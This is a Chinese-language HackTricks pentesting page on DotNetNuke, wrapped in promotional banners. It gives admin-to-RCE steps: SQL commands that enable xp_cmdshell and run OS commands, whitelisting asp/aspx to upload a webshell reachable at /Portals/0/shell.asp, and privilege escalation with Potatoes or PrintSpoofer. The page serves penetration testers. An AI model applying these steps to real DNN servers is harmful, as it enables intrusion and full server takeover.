DotNetNuke (DNN)

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

你在一个网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想要获取PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！
发现我们的独家NFT收藏品The PEASS Family
获取官方PEASS和HackTricks周边产品
加入💬 Discord群组 或者 telegram群组 或者关注我在Twitter上的🐦@carlospolopm.
通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。

如果你以管理员身份登录DNN，很容易获得RCE。

RCE

在**Settings页面下可以访问SQL控制台，你可以在那里启用xp_cmdshell并运行操作系统命令**。

使用以下代码启用**xp_cmdshell**：

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

然后，点击**"运行脚本"**来执行这些SQL语句。

接下来，使用类似下面的方法来执行操作系统命令：

xp_cmdshell 'whoami'

在 设置 -> 安全 -> 更多 -> 更多安全设置 下，你可以在 允许的文件扩展名 中添加新的允许扩展名，然后点击 保存 按钮。

添加 asp 或 aspx，然后在 /admin/file-management 中上传一个名为 shell.asp 的 asp webshell 作为示例。

然后访问 /Portals/0/shell.asp 来访问你的 webshell。

你可以使用 Potatoes 或 PrintSpoofer 等工具来进行提权。

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

你在一家 网络安全公司 工作吗？你想在 HackTricks 中 为你的公司做广告 吗？或者你想获得 PEASS 的最新版本或下载 HackTricks 的 PDF 版本 吗？请查看 订阅计划！
发现我们的独家 NFTs 集合 The PEASS Family
获取 官方 PEASS & HackTricks 商品
加入 💬 Discord 群组 或 Telegram 群组，或者在 Twitter 上关注我 🐦@carlospolopm。
通过向 hacktricks 仓库和 hacktricks-cloud 仓库提交 PR 来分享你的黑客技巧。